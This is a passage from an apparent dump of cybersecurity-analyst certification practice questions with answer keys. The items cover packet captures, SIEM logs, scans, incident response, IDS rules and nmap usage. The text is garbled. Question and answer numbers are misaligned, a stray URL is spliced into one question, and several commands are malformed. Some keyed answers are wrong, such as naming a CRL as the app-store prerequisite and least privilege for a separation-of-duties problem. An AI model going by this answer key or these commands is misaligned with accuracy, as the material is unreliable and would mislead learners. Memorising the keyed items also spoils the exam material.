     74.125.131.2767.35.20.70TCPsmtp(25) -> 61234 [SYN, ACK] Seq=0Ack=1Win=29312Len=0
     67.35.20.7074.125.131.27TCP61234 -> smtp(25) [ACK] Seq=1Ack=1Win=29312Len=0
     67.35.20.7074.125.131.27SMTPS : 250mx.ehlo
     74.125.131.2767.35.20.70SMTPS : 250mx . yahoo.comsayinghello
     68.35.20.7074.125.131.27TCP61234 -> smtp (25) [ACK] Seq=7Ack=219 Win=30336Len=0
     68.35.20.7074.125.131.27SMTPC : quit
     209.53.215.3474.125.131.27TCP59139 -> http80 [ACK] Seq=1Ack=1Win=4128Len=0
     74.125.131.27209.53.215.34SSHServer : Protocol (SSH-2.0-Cisco-1.25)
     209.53.215.3474.125.131.27SSHC1ient : Protocol (SSH-1.99-Cisco-1.25)
     74.125.131.27209.53.215.34SSHv2Server : KeyExchangeInit
     153.22.17.874.125.131.27TCP61234 -> smtp (25) [SYN] Seq=0Win=29200Len=0
     74.125.131.27153.22.17.8TCPsmtp (25) -> 61234 [SYN, ACK] Seq=0Ack=1Win=42540Len=0
     74.125.131.27153.22.17.8SMTPS : 220mx . google.comESMTPq8si1038396vcq.58 - gsmtp
     153.22.17.874.125.131.27TCP61234 -> smtp (25) [ACK] Seq=1Ack=25Win=29312Len=0
     153.22.17.874.125.131.27SMTPC : ehlo
     74.125.131.27153.22.17.8TCPsmtp (25) -> 61234 (ACK) Seq=52Ack=7Win=42624Len=0
     74.125.131.27153.22.17.8SMTPS : 250mx. Google.comatyourservice
     153.22.17.874.125.131.27SMTPC : quit
     Which of the following should be the NEXT step in the investigation?

a. Log on the server at IP address 74.125.131.27 and determine the process using port 80
b. Log on the server at IP address 74.125.131.27 and determine the process using port 25.
c. Check with the network team to see if the IP address 67.35.20.70 has connected to any other services.
d. Ask the network team to blackhole the IP address 153.22.17.8 to prevent further connections.

Answer 191

d. Ask the network team to blackhole the IP address 153.22.17.8 to prevent further connections.

Question 192

191. A company website has been compromised. A security analyst reviews the latest SIEM report to attempt to discover how the attack occurred. The SIEM contains the following entries.
     File not found on server “web01.company.com” exceeded 24 times
     /var/www/html/drupal 3 times 12.17.224.131
     /var/www/html/typepad 3 times 12.17.224.131
     /var/www/html/blog 3 times 12.17.224.131
     /var/www/html/disqus 3 times 12.17.224.131
     /var/www/html/git 3 times 12.17.224.131
     /var/www/html/svn 3 times 12.17.224.131
     /var/www/html/cvs 3 times 12.17.224.131
     /var/www/html/blogger 3 times 12.17.224.131
     Access denied on server “web01.company.com” exceeded 24 times
     User : root 4 times 12.17.224.131
     User : admin 4 times 12.17.224.131
     User : administratrator 4 times 12.17.224.131
     User : wpuser 4 times 12.17.224.131
     User : wpadmin 4 times 12.17.224.131
     User : wordpress 4 times 12.17.224.131
     Given the above logs, which of the following MOST likely occurred, causing the compromise? (Select TWO).

a. The attacker utilized a list of the most common content management systems to discover if the server was running one.
b. The attacker tried several directory traversal attacks to see if any were susceptible to the more common vulnerabilities.
c. The attacker avoided tripping any alerts by staying under the default alert threshold counts with each attack attempt.
d. The attacker used a focused set of the most common account names to attempt to gain access to the website
e. The attacker enumerated the list of authors who post on the website and attempted to log in as each of them.

Answer 192

a. The attacker utilized a list of the most common content management systems to discover if the server was running one.
e. The attacker enumerated the list of authors who post on the website and attempted to log in as each of them.

Question 193

192. An analyst is reviewing a list of vulnerabilities, which were reported from a recent vulnerability scan of a Linux server. Which of the following is MOST likely to be a false positive?

a. OpenSSH/OpenSSL package Random Number Generator Weakness
b. Apache HTTP Server Byte Range DoS
c. GDI+ Remote Code Execution Vulnerability (MS08-052)
d. HTTP TRACE / TRACK Methods Allowed (002-1208)
e. SSL Certificate Expire

Answer 193

c. GDI+ Remote Code Execution Vulnerability (MS08-052)

Question 194

193. An analyst is detecting Linux machines on a Windows network. Which of the following tools should be used to detect a computer operating system?

a. whois
b. netstat
c. nmap
d. Nslookup

Answer 194

c. nmap

Question 195

194. A data center manager just received an SMS alert that a server cage was accessed using an authorized code. The manager does not recall receiving a notification by email for any scheduled maintenance on servers in the cage. Which of the following is the FIRST step the manager should take?

a. Check the change management logs at the earliest convenience to determine if the change was authorized.
b. Remote access to the server and change the password to prevent the intruder from accessing the system.
c. Request a firewall administrator to implement an ACL to contain any potential damage.
d. Call the security guard to investigate the situation.

Answer 195

d. Call the security guard to investigate the situation.

Question 196

195. An organization recently has its strategy posted on a social media website. The document posted to the website is an exact copy of a document stored on only one server in the organization. A security analyst sees the following output from a command-line entry on the server suspected of the problem.
     Active Connections
     Photo Local Address Foreign Address State PID Process Name
     TCP 192.168.13.5 11.13.100.7 ESTABLISHED 422 (firefox.exe)
     TCP 192.168.13.5 34.11.110.9 ESTABLISHED 516 (firefox.exe)
     TCP 192.168.13.5 144.10.62.7 ESTABLISHED 773 (firefox.exe)
     TCP 192.168.13.5 0.0.0.0 LISTENING 123 (svchost.exe)
     Which of the following would be the BEST course of action?

a. Remote the malware associated with PID 773.
b. Monitor all the established TCP connections for data exfiltration.
c. Investigate the malware associated with PID 123.
d. Block all TCP connections at the firewall.
e. Figure out which of the Firefox processes is the malware.

Answer 196

a. Remote the malware associated with PID 773.

Question 197

196. An audit has revealed that the database administrator is also responsible for auditing database changes and backup logs. Which of the following access control methodologies would BEST mitigate this concern?

a. Time-of-day restriction
b. Separation of duties
c. Principle of least privileged
d. Role-based access control

Answer 197

c. Principle of least privileged

Question 198

197. An organization with a small IT department deploys the following security capabilities but is struggling with aggregating and analyzing security logs:
     - Enterprise antivirus
     - Layer 7 firewalls
     - Network-based IPS
     - DLP appliance
     The security administrator is concerned with the lack of event correction and the inability to dedicate more resources to a SIEM and its monitoring. Which of the following should the company implement to BEST resolve this issue?

a. Cloud-based SIEM
b. Security as a service
c. Automated reporting
d. Centralized Syslog

Answer 198

a. Cloud-based SIEM

Question 199

198. A security administrator needs to create an IDS rule to alert on FTP login attempts by root. Which of the following rules is the BEST solution?

a. alert udp any any -> root any -> 21
b. alert tcp any any -> any 21 (content: “root”)
c. alert tcp any any -> any root 21
d. alert tcp any any -> any root (content: “ftp”)

Answer 199

b. alert tcp any any -> any 21 (content: “root”)

Question 200

199. An organization is performing vendor selection activities for penetration testing, and security analyst is reviewing the MOA and rules of engagement, which were supplied with proposals. Which were supplied with proposals? Which of the following should the analyst expect will be included in the document and why?

a. The scope of the penetration test should be included in the MOA to ensure penetration testing is conducted against only specifically authorized network resources.
b. The MOA should address the client SLA in relation to reporting results to regulatory authorities, including issuing banks for organizations that process cardholder data.
c. The rules of engagement should include detailed results of the penetration scan, including all findings, as well as the designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test.
d. The exploitation standards should be addressed in the rules of engagement to ensure both parties are aware of the depth of exploitation that will be attempted by penetration testers.

Answer 200

d. The exploitation standards should be addressed in the rules of engagement to ensure both parties are aware of the depth of exploitation that will be attempted by penetration testers.

Question 201

200. A security architect is reviewing the options for performing input validation on incoming web form submission. Which of the following should the architect suggest as the MOST secure and manageable option?

a. Client-side whitelisting
b. Server-side whitelisting
c. Server-side blacklisting
d. Client-side blacklisting

Answer 201

b. Server-side whitelisting

Question 202

201. A cybersecurity analyst is conducting packet analysis on the following:
     Time Source Destination Info
     0.000353 00:43.b3:3f:23:e3 ff:ff:ff:ff:ff:ff Who has 172.16.45.2017 Tell 172.16.1.7
     Which of the following is occurring in the given packet?

a. ARP request
b. ARP reply
c. Ping request
d. Ping reply
e. MAC filtering
f. IP spoofing

Answer 202

a. ARP request

Question 203

202. The computer incident response team at a multinational company has determined that a breach of sensitive data has occurred in which a threat actor has compromised the organization’s email system. Per the incident response procedures, this breach requires notifying the board immediately. Which of the following would be the BEST method of communication?

a. Post on the company blog
b. Corporate-hosted encrypted email
c. VoIP phone call
d. Summary sent by certified mail
e. Externally hosted instant message

Answer 203

d. Summary sent by certified mail

Question 204

203. A company installs ICS devices to manage the building’s lighting controls. The network administrator places the controllers on a VLAN segment of the company’s network. After a month, senior management reports someone has been modifying the lights on the building floors after hours to spell words on the building. The security administrator is tasked with resolving the issue immediately and stopping access to the ICS devices. Which of the following is the BEST method to quickly secure the devices for controlling the lights at a minimum cost to the company?

a. Configure a network for separating the devices from the business network
b. Create a group policy to blacklist the ICS web applications on company devices.
c. Change the default password on the ICS devices to restrict user access.
d. Add a different privileged account on the ICS devices.

Answer 204

a. Configure a network for separating the devices from the business network

Question 205

204. A business recently installed a kiosk that is running on a hardened operating system as a restricted user. The kiosk application is the only application that is allowed to run. A security analyst gets a report that pricing data is being modified on the server, and management wants to know how this is happening. After reviewing the logs, the analyst discovers the root account from the kiosk is accessing the files. After validating the permission on the server, the analyst confirms the permissions from the kiosk do not allow access to write to the server data. Which of the following is the MOST likely reason for the pricing data modifications on the server?

a. Data on the server is not encrypted, allowing users to change the pricing data.
b. The kiosk user account has executed permission on the server data files.
c. Customers are logging off the kiosk and guessing the root account password
d. Customers are escaping the application shell and gaining root-level access

Answer 205

d. Customers are escaping the application shell and gaining root-level access

Question 206

205. A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive the customer feedback and store it in a local database. The web server is placed in a DMZ network, and web service and file systems have been hardened. However, the cybersecurity analyst discovers data from the database can be mined from over the Internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

a. Configure the database to listen for incoming connections on the internet network.
b. Change the database connection string and apply the necessary patches.
c. Configure an ACL in the border firewall to block all connections to the webserver for ports different than 80 and 443
d. Deploy a web application firewall to protect the web application from attacks to the Database.

Answer 206

c. Configure an ACL in the border firewall to block all connections to the webserver for ports different than 80 and 443

Question 207

206. A security analyst has concluded that suspicious intermittent network activity us coming from one or more systems using random IP addresses and MAC addresses. The same IP or MAC address is not used twice. Which of the following is the BEST course of action to identify the source of the suspicious activity when it resumes?

a. Configure a dynamic sinkhole.
b. Review the firewall logs.
c. Trace down to the switchport.
d. Review the network IDS logs.

Answer 207

c. Trace down to the switchport.

Question 208

207. The SCADA team reported unusually high memory usage on two servers they attributed to the monitoring software installed on them. There was also a PowerShell script executing at random intervals without any user interaction. The antivirus and HIDS reports were clean. However, the change detection report showed several high-range ports were opened and services were started in the last week. Which of the following is the best NEXT step to respond to this incident?

a. Isolate the devices on the network.
b. Increase the server’s memory.
c. Apply new antivirus and HIDS signatures.
d. Disable PowerShell.

Answer 208

a. Isolate the devices on the network.

Question 209

208. A company is developing its first mobile application, which will be distributed via the official application stores of the two major mobile platforms. Which of the following is a prerequisite to making the applications available in the application stores?

a. Distribute user certificates.
b. Deploy machine/computer certificates.
c. Obtain a code-signing certificate.
d. Implement a CRL.

Answer 209

d. Implement a CRL.

Question 210

209. Risk management wants IT to implement a solution that will permit an analyst to intercept, execute, and analyze potentially malicious files that are downloaded from the Internet. Which of the following would BEST provide this solution?

a. File fingerprinting
b. Decomposition of malware
c. Risk evaluation
d. Sandboxing

Answer 210

d. Sandboxing

Question 211

210.	The Chief Information Security Officer (CISO) is reviewing the latest threat intel, and there are indications of a new threat that targets Windows-based hosts on port 514. The CISO wants to prepare to mitigate the threat by identifying any assets that may be affected. The initial scan returns the following incomplete information:
Scan report for WTBAC_10312000
Host is up (0.014s latency)
Not shown: 995 filtered port
Port State Service
22/tcp open ssh
443/tcp open https
444/tcp open snpp
514/tcp open shell
2222/tcp closed Ethernet/IP-1
MAC Address : 00:0C:29:15:4a:1F (VMware)
Which of the following commands should be used to provide the correct information for the CISO?

a. nmap -sS 170.20.10.0/24
b. nmap -sV -0 172-20-10-0/24
c. nessus -q -x -T html <172.20.10.23> .txt 172.20.10.0/24
d. nmap -v -Pn -Su -St -p , T:21-25, 80, 139, 514 172.20.10.0/24

Answer 211

b. nmap -sV -0 172-20-10-0/24

Question 212

211. A company office was broken into over the weekend. The office manager contacts the IT security group to provide details on which servers were stolen. The security analyst determines one of the stolen servers contained a list of customers PII information, and another server contained a copy of the credit card transactions processed on the Friday before the break-in In addition to potential security implications of information that could be gleaned from those servers and the rebuilding/ restoring of the data on the stolen systems, the analyst needs to determine any communication or notification requirements with respect to the incident. Which of the following items is MOST important when determining what information needs to be provided, who should be contacted, and when the communication needs to occur?

a. Total number of records stolen
b. Government and industry regulations
c. Impact on the reputation of the company’s name/brand
d. Monetary value of data stolen

Answer 212

b. Government and industry regulations

Question 213

212. An organization wants to perform network scans to identify active hosts and vulnerabilities. Management places the highest priority on scans that mimic how an attack would progress. If time and resources allow, subsequent scans can be performed using different techniques and methods. Which of the following scan types and sequences would BEST suit the organization’s requirements?

a. Non-credentialed scans followed by credentialed scans.
b. Credentialed scans followed by compliance scans
c. Compliance scans followed by credentialed scans
d. Compliance scans followed by non-credentialed scans

Answer 213

a. Non-credentialed scans followed by credentialed scans.

Question 214

213.	A security analyst must perform quarterly vulnerability scans to keep the organization in compliance with PCI regulations. The analyst has scheduled the scans to occur early on Monday morning and uses Nexpose on 192.168.65.32 to run scans on the entire network. The morning after the scan was run, the analyst received the following alert from the network-based IDS system.
XXE Attack Detected
Source:
 	192.168.65.32
Destination:
 	192.168.70.35
 	192.168.70.36
 	192.168.70.37
 	192.168.70.38
 	192.168.70.39
An XXE attack was detected originating from an internal IP address, further investigation is needed to determine if the internal device is compromised. Which of the following would be the BEST way to address this alert while remaining in compliance with PCI regulations?

a. Create a firewall rule restricting traffic from 192.168.65.32 to the 192.168.70 network
b. Isolate 192.168.65.32 and begin incident response procedures on the device
c. Disable any services that are vulnerable to XXE attacks on the destination servers.
d. Validate that the alert is a false positive triggered by the scanning process

Answer 214

d. Validate that the alert is a false positive triggered by the scanning process

Question 215

214. A security engineer is trying to determine why there are traffic spikes from a new storage server fleet at 2.00 a.m. every weekday. The engineer suspects the server fleet was compromised by a supply chain attack and engages a forensics firm to analyze the configuration and software stack. The forensics analysis gives the storage server fleet a clean bill of health. Which of the following is the MOST likely explanation for what is occurring in this scenario?

a. Scheduled network-based backups are occurring on the new fleet
b. The traffic graphs have misattributed the load to the storage fleet.
c. There is a nation-state attack and subverted forensic analysis.
d. There is stealthy C2 malware phoning home

Answer 215

a. Scheduled network-based backups are occurring on the new fleet

Question 216

215. Following the development of a company’s new online application, a security analyst is brought in to test the site’s security before going live. The analyst is given the following URL and credentials.
     https://app.company.com/Guest
     User ID: UserBob
     Password : S#7h&sh*g

After logging in, the URL changes to the following, and the system displays a screen with graphs of various data points.
https://app.company.com/User/dashboard.php?view=graphs

Which of the following is the BEST choice for a reasonable test of circumventing the site’s security?

a. Try different combinations of credentials and passwords.
b. Use the browser’s View Source” feature to see the underlying HTML
c. Browse explicitly to the URL https://app.company.com/Admin
d. After the URL parameters to dashboard.php?view=charts

Answer 216

c. Browse explicitly to the URL https://app.company.com/Admin

Question 217

217. During the annual review and testing of incident response, the analyst determines that assets involved in an incident are isolated, reimaged, and then returned to service. A review of the lessons learned from the incident shows that further research on the cause of the incident may be needed, including providing data to external sources like law enforcement in the event criminal activity is suspected. Which of the following fools would be appropriate to recommend to the Chief Information Security Officer (CISO) to provide encompassing support for incident response and forensics?

a. Shasum
b. EnCase
c. DD
d. MRTG

Answer 217

b. EnCase

Question 218

218. A security analyst is trying to interpret the results of the following packet capture to see if there is any suspicious activity.
     2.717757 192.168.1.110 -> 192.168.1.132 TCP 58 45571 > 53 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
     2.717914 192.168.1.110 -> 192.168.1.132 TCP 58 45571 > 443 [SYN] Seq=0 Win=4096 Len=0 MSS=1460
     2.718227 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 80 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
     2.719234 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 21 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
     2.719469 192.168.1.110 -> 192.168.1.132 TCP 58 45573 > 3389 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
     2.719943 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 25 [SYN] Seq=0 Win=2048 Len=0 MSS=1460
     2.720418 192.168.1.110 -> 192.168.1.132 TCP 58 45572 > 22 [SYN] Seq=0 Win=3072 Len=0 MSS=1460
     Which of the following BEST describes this packet capture?

a. It shows normal DNS request traffic among users and servers.
b. It shows an attempted PING sweep of the network devices.
c. It shows a network server responding to various web requests in order.
d. It shows an attempted port scan of the network devices.

Answer 218

d. It shows an attempted port scan of the network devices.

Question 219

219. After reviewing wireless network traffic logs, a security analyst notices an unusual number of handshakes. Which of the following is MOST likely happening?

a. TCP reset of connections
b. Rainbow table decryption
c. Forced TLS downgrading
d. Forced deauthorization

Answer 219

d. Forced deauthorization

Question 220

220. Which of the following is a vulnerability that is specific to hypervisors?

a. DDoS
b. VLAN hopping
c. Weak encryption
d. WMescape

Answer 220

d. WMescape

Question 221

221. A malicious hacker wants to gather guest credentials on a hotel 802.11 network. Which of the following tools is the malicious hacker going to use to gain access to information found on the hotel network?

a. Nikto
b. Aircrak-ng
c. Nessus
d. tcpdump

Answer 221

b. Aircrak-ng

Question 222

222. An alert is issued from the SIEM that indicates a large number of failed login for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account mohttps://docs.google.com/document/d/1SqYtQce7OrlknwboFUQQz7AjQil34RgHXykLJu7sMY8/editrning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.
b. The host-based firewall is blocking port 389 LDAP communications, preventing the login credentials from being received by the application server.
c. The license for the application has expired, and the failed logins will continue to occur until a new license key is installed on the application.
d. A successful malware attack has provided someone access to the network and failed login attempts are an indication of an attempt to privilege access to the application.

Answer 222

a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.

Question 223

216. A security analyst is reviewing the most recent company scan results. Multiple Linux systems do not return any results. A comparison of the previous report, however, shows these same systems had several open vulnerabilities. Which of the following steps should the security analyst take NEXT?

a. Submit the results to operations for validation of remediation.
b. Ensure the systems are available to the scanner.
c. Submit the remediation report to management to illustrate progress.
d. Ensure kernel access is granted to the scanner for authentication.

Answer 223

b. Ensure the systems are available to the scanner.

Question 224

223. An analyst conducting a log review and identifies the following snippet in one of the logs.
     Jun 10 07:09:10 databse1 sshd[24665] : Invalid user root from 101.79.130.213
     Jun 10 07:36:03 databse1 sshd[24901] : Invalid user root from 101.79.130.213
     Jun 10 07:42:44 databse1 sshd[24938] : Invalid user root from 101.79.130.213
     Jun 10 07:56:11 databse1 sshd[26570] : Invalid user root from 101.79.130.213
     Jun 10 08:02:55 databse1 sshd[30144] : Invalid user root from 101.79.130.213
     Which of the following MOST likely caused this activity?

a. SQL injection
b. Privilege escalation
c. Forgotten password
d. Brute force

Answer 224

d. Brute force

Question 225

224. A penetration test for the internal DNS service of a company is scheduled, and the security analyst uses the tcpdump udp port 53-i eth0 command to get a packet capture from the DNS server that will be used to confirm any findings. During the daily report meeting, the penetration tester reports a zone transfer vulnerability using the dig -axfr command against the server. The analyst opens the packet capture from the day before, but there are no traces of the transfer. Which of the following is the MOST likely cause of this issue?

a. A false positive was reported by the penetration tester.
b. The packet analyzer software does not support DNS protocol parsing
c. The zone transfer used a different protocol.
d. The zone transfer happened before the packet capture started.
e. The DNS zone transfer used a different port and was filtered out of the capture.
f. Tcpdump does not support capturing DNS packets.

Answer 225

e. The DNS zone transfer used a different port and were filtered out of the capture.

Question 226

225. A system is experiencing noticeably slow response time, and use is being locked out frequently. An analyst asked for the system security plan and found the system comprises two servers an application server in the DMZ and a database server inside the trusted domain. Which of the following should be performed NEXT to investigate the availability issue?

a. Review the firewall logs.
b. Review syslogs from critical servers.
c. Perform fuzzing.
d. Install a WAF in front of the application server.

Answer 226

b. Review syslogs from critical servers

Question 227

226. A systems administrator at a company notices an unknown, randomly named process running on a database server that contains several terabytes of personal and account data for customers. Reviewing the server, the administrator notices the process was installed and began running two days ago. Database logs stored off the server indicate unusual queries were run but not against tables containing personal and account data. Network logs show encrypted network traffic at minimal levels to an external IP address that began shortly after the process started and ended at midnight yesterday when the threat intelligence feed automatically blocked the IP address. Which of the following is the BEST course of action?

a. Kill the process, quarantine the server, and begin examining the logs of other devices to which this server has connectivity.
b. Contact all customers with records in the database to let them know their information may have been compromised.
c. Kill the process, delete it from the server to prevent it from spreading, and restore a backup of the server.
d. Leave the process running and remove the network block, allowing the administrator to study the process and determine its purpose

Answer 227

a. Kill the process, quarantine the server, and begin examining the logs of other devices to which this server has connectivity.

Question 228

227. A security analyst is reviewing SIEM logs and notices several hundred alerts related to a server are reporting for the usual time period when users are not working on the server. The analyst believes the data collected in the SIEM tools are being collected incorrectly. Which of the following should the security administrator verify the data collected is properly identified?

a. Set up FTP service and redirect all logs to a central data location
b. Configure all devices to use an NTP server to sync with the SIEM tool
c. Change the SIEM data collector to pull log files on an hourly basis.
d. Adjust the security permission on the log files to read-only to prevent changes.

Answer 228

b. Configure all devices to use an NTP server to sync with the SIEM tool

Question 229

228. During an annual compliance and vulnerability scan, the security assurance company discovers that 95% of its customer’s firewall and proxy settings have been changed from the company’s hardening standards to the factory default setting. This is a dramatic difference from the typical number of vulnerabilities found. Which of the following has MOST likely happened?

a. The vendor has swept the networks with an uncredentialed scan.
b. The network has been compromised and is under attack.
c. A network administrator inadvertently restored archived configuration files
d. The security standards have changed.

Answer 229

c. A network administrator inadvertently restored archived configuration files

Question 230

229.	An excerpt from the process list of a known compromised host is shown below:
Process Parent
smss.exe System
services.exe winnit.exe
svchost services.exe
isass.exe wininit.exe
explorer.exe
firefox.exe explorer.exe
AcroRd32.exe firefox.exe
powershell.exe AcroRd32.exe
Winword.exe explorer.exe
winlogon.exe
Which of the following would be the MOST plausible scenario describing what happened?

a. The user opened an infected PDF file from a personal webmail account.
b. The user installed an infected version of Mozilla Firefox from a flash drive.
c. An attacker used mimikatz to steal kerberos tokens from the isass.exe process.
d. An insider is running a PowerShell script to steal user credentials.

Answer 230

a. The user opened an infected PDF file from a personal webmail account.

Question 231

230. A manufacturing company has decided to participate in direct sales of its products to consumers. The company decides to use a subdomain of its main site with its existing cloud service provider as the portal for e-commerce. After launch, the site is stable and functions properly, but after a robust day of sales, the site begins to redirect to a competitor’s landing pages. Which of the following actions should the company’s security team take to determine the cause of the issue and minimize the scope of impact?

a. Engage a third party to provide penetration testing services to see if an exploit can be found.
b. Check DNS records to ensure Cname or alias records are in place for the subdomain.
c. Query the cloud provider to determine the nature of the DNS attack and find out which other clients are affected.
d. Check the DNS records to ensure a correct MX record is established for the subdomain.

Answer 231

b. Check DNS records to ensure Cname or alias records are in place for the subdomain

Question 232

231. Given the following vulnerability summary:
     Source: US-CERT/NIST
     Overview
     Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impacts via crafted use of the mmap and bpf system calls.
     Cvss v3 Base score : 7.8

Of which of the following exploitation strategies does the above vulnerability make use?

a. Attempting to put more data in a memory location than it can hold
b. Referencing a memory location after it is no longer being used
c. Causing the return from a subroutine to jump to a random address
d. Temporarily or indefinitely disrupting services to intended users

Answer 232

b. Referencing a memory location after it is no longer being used

Question 233

232. Malware was detected on a corporate network with more than 100 workstations and servers per branch. The malware tried to connect to all available network shares and shared folders it could detect on the network, and then started to encrypt the documents. To stop any further damages, the file servers are taken offline until the situation is fixed. The security analyst team must identify which computers are infected and infected and then eradicate the malware. The company has full packet captures, netflow, and firewall logs of every branch. Which of the following would be the FASTEST way to identify the affected workstations?

a. Use the packet capture and search in a packet analyzer for workstations that are connected to the file servers. Sort them chronologically, and then proceed to review those workstations.
b. Use the netflow capture to filter by port used, identify workstations with multiple connections, and sort by the number of connections and destinations. Then, proceed to review those workstations.
c. Use the firewall logs to detect connections to central file servers and proceed to review the event logs on each workstation.
d. Enable file access auditing on the file servers, set all files with read-only permissions, and put the servers back online to then detect anomalous activity on the file servers’ logs.

Answer 233

b. Use the netflow capture to filter by port used, identify workstations with multiple connections, and sort by the number of connections and destinations. Then, proceed to review those workstations.

Question 234

233. A security analyst is reviewing the vulnerability scan results of the company’s hardened web servers. The results indicate there are no high-risk vulnerabilities, even though the webserver version is very old with known vulnerabilities that have a CVSS score of 7 and higher running on port 443. Which of the following is the MOST likely cause of this error?

a. TLS scans require the private key.
b. A credentialed scan is required when TLS is in use.
c. The server header reported a wrong version.
d. Scores must exceed 8 to be classified as high.

Answer 234

d. Scores must exceed 8 to be classified as high.

Question 235

234. ** An FTP server in the DMZ is used to provide non-sensitive media files to customers all over the world. The user accounts on the server are shared by various groups. An administrator complains that processor utilization has been pegged for the last few days by what appears to be a common system process. Which of the following would be an analyst’s BEST course of action?

a. Disconnect the network cable immediately, capture a memory image to begin the offline analysis, and block inbound TCP port 21 on the firewall.
b. Identify and recent users added to the system, remove or disable those user accounts, and install Fail2ban on the server.
c. Make a copy of the system process for further analysis, kill and delete it from the system, and remove any files created in the last seven days.
d. Verify the validity of the system process, check the log files for any malicious activity, and initiate a restart of the server.

Answer 235

d. Verify the validity of the system process, check the log files for any malicious activity, and initiate a restart of the server.

Question 236

235. During a cyber incident response, an employee is discovered to be involved in the company’s Big Data analytics compromise. The employee has ties to an adversary in the business marked of data analytics. The employee is caught and apprehended. Which of the following professionals would be the FIRST to handle the situation involving the employee?

a. Police
b. Human resources
c. Lawyer
d. Security officer

Answer 236

b. Human resources

Question 237

236. A security administrator at an IT firm is receiving reports that files are being uploaded to a company’s web server by an unauthorized user. The security administrator investigates this event, and the company starts to receive phone calls about selling robots. After reviewing several files on the web server, the administrator finds the following encoded file that is getting an HTTP GET from several sources every minute:
     A:4087 : (s:32:”/is-buying-robots-on-line-legal/”;i:0;s:32:”/robots-online-expressdelivery/”;i:5209:s:32:”/buy-robots-without-downpayment/”;i:10014;s:25:”/trial-forrobots/”;i:15115;s:30:”/generic-robots-fast/”;i:19480;s:25:”/lowest-price-for-robots/”;i:24601;s:28:”
     /robotscanada-where-to-buy/”;i:29650;s:17:”/name-for-robots/”i:34799;s:28:”/order-robot-online/”;i:3990
     8;s

Which of the following is MOST likely occurring within the file?

a. Artificial intelligence is creating redirects for where to buy robots.
b. Item numbers are created within the company’s online sales catalog to display robots.
c. Directories are created that have the text string “robot” in them.
d. It is creating meta tags with the word “robots” that search engines are discovering.

Answer 237

d. It is creating meta tags with the word “robots” that search engines are discovering.

Question 238

237. An organization is working with a number of value-added resellers to scope and budget an upcoming networking infrastructure overhaul. During the vendor selection process, which of the following should the organization require vendors to provide to mitigate security issues that may arise in the supply chain?

a. Business continuity plan
b. SLAs with OEM suppliers
c. installation and configuration procedures
d. Hardware authenticity verification procedures
e. Vendor risk analysis procedures

Answer 238

e. Vendor risk analysis procedures

Question 239

238. Which of the following groups is responsible for refereeing an engagement between a mock attacker and actual defender of an enterprise network during a cyber training exercise to secure a corporate environment?

a. White team
b. Green team
c. Blue team
d. Red team

Answer 239

a. White team

Question 240

239. A security analyst is reviewing the results of an external penetration test about the wireless network at a company. The report finds the following vulnerabilities:
     The tester could access corporate resources through the open wireless network named “Cafe”.
     The wireless network at Building 1 can be accessed in the parking lot.
     Two hidden SSIDs named “Admincompany R” and “Testcompany R” were discovered.
     A standalone wireless printer network was found in Building 2.
     Which of the following remediation solutions needs to be in place FIRST?

a. Turn off the wireless printer network at Building 2.
b. Identify if there is a business justification for the wireless broadcast range for Building1.
c. Disable hidden SSIDs for all wireless networks.
d. Establish a VLAN segregation for the “Cafe” wireless network.

Answer 240

d. Establish a VLAN segregation for the “Cafe” wireless network.

Question 241

240. A system analyst is performing a preliminary port map of a client’s network using Nmap. The analyst is not getting results back, and a message states

“Note: Host seems down. If it is really up, but blocking our ping probes, try -pn” for all hosts, even on IP addresses hosting the corporate website. A cloud-hosted test server can be scanned.”

Which of the following is the MOST likely cause of this issue and the recommended next step?

a. There is an Internet outage between the analyst’s workstation and the client’s network. Wait an hour and run the Nmap scan again.
b. The client’s advanced next-generation firewall immediately identified the probes, and the workstation is blacklisted. Ask the client to put an IP “Any” “Any” entry for the workstation’s IP.
c. The client’s network is temporarily down for a maintenance window. Contact the client and rescan with Nmap when out of the maintenance window.
d. The client’s advanced next-generation firewall is filtering either ICMP Type 0 or ICMP. Type 8 packets. Rerun the scan skipping host discovery.

Answer 241

d. The client’s advanced next-generation firewall is filtering either ICMP Type 0 or ICMP. Type 8 packets. Rerun the scan skipping host discovery.

Question 242

241. An analyst wants to build a lab with multiple workstations to practice penetration testing in a test environment. Which of the following will provide the analyst with the MOST penetration-testing-specific features?

a. Nessus
b. Qualys
c. Metasploit
d. Nexpose

Answer 242

c. Metasploit

Question 243

242. A security analyst has been monitoring phishing test results over the past 90 days. During this time, employees have responded to test phishes that seem to involve their job responsibilities, but they have rarely responded to test phishes that relate to personal gain or curiosity. Which of the following should the analyst recommend to BEST help minimize the impact of future attempts?

a. A new email security appliance with more aggressive filters.
b. Automated reporting for each failure of the phishing tests.
c. A new DLP appliance to prevent data exfiltration.
d. Additional training that focuses on awareness and trends

Answer 243

d. Additional training that focuses on awareness and trends

Question 244

243. An organization needs to implement a vulnerability management process and prioritize scans based on the server function and types of data processed on those servers. The following is a summary of the organization’s subnets and servers:
     192.168.1.0/30 File servers storing corporate marketing materials
     192.168.1.8/29 File servers storing client PII
     192.168.1.16/29 Web servers that process sales data but have no data resident of the
     servers.
     192.168.1.32/28 Database servers strong company sales data but nothing else.
     192.168.1.64/27 Development servers with application source code and nothing else.

Which of the following servers would receive the HIGHEST priority for a vulnerability scan?

a. 192.168.1.3
b. 192.168.1.8
c. 192.168.1.11
d. 192.168.1.38
e. 192.168.1.99

Answer 244

b. 192.168.1.8

Question 245

